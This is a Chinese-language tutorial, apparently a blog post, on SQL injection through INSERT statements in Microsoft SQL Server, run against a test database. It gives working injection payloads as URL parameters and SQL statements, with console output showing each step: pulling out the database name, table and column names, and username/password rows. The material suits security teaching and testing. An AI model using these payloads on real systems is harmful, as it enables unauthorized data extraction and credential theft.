0x01 前言
UPDATE-INSERT的注入是一样的,这里演示的话,我就使用 INSERT 注入演示了
因为他们的注入都是修改某条数据/插入某条数据,然后我们去其他界面查看
0x02 测试数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x03 获取库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?data='+db_name()+‘
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+db_name()+’’)
1> INSERT INTO article(title, content)VALUES('漏洞测试', ''+db_name()+'')2> go(1 rows affected)# 当前库 = test1> select * from article2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 5 | 漏洞测试 | test |+----+-----------+-----------+(3 rows affected)
0x04 获取表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
web语句: http://www.test.com/sql.php?data='+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’’)
# 获取 1表1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 6 | 漏洞测试 | article |+----+-----------+-----------+(3 rows affected)
# 获取 2表1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 2) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 7 | 漏洞测试 | users |+----+-----------+-----------+(3 rows affected)
0x05 获取字段
注意:
OVER(Order by name ) 里面的 name 要修改为 test.dbo.SysColumns 表里面存在的一个字段
查询不同的表可以这样
例如:
Object_id(‘要查询的表名’)
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?data='+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’’)
# users 表字段名称1> select name FROM test.dbo.SysColumns Where id=Object_id('users')2> go+-----------+| name |+-----------+| id || password || username |+-----------+(3 rows affected)
# 获取当前库 users表 第一个字段名称1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTTOP 1 nameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.SysColumnsWHEREid = Object_id('users')) AS aWHEREa.row_number = 1) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 8 | 漏洞测试 | id |+----+-----------+-----------+(3 rows affected)
# 获取当前库 users表 第二个字段名称1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTTOP 1 nameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.SysColumnsWHEREid = Object_id('users')) AS aWHEREa.row_number = 2) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 9 | 漏洞测试 | password |+----+-----------+-----------+(3 rows affected)
0x06 获取内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?data='+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’
数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’’)
# 查询users表 第一条数据1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTCAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)FROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 1) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-------------------------+| id | title | content |+----+-----------+-------------------------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 10 | 漏洞测试 | 1 |test-user-01|123456 |+----+-----------+-------------------------+(3 rows affected)
# 查询users表 第二条数据1> INSERT INTO article (title, content)VALUES('漏洞测试','' + (SELECTCAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)FROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 2) + '')2> go(1 rows affected)1> select * from article2> go+----+-----------+-------------------------+| id | title | content |+----+-----------+-------------------------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 || 11 | 漏洞测试 | 2 |test-user-02|234567 |+----+-----------+-------------------------+(3 rows affected)
若有收获,就点个赞吧
0 人点赞
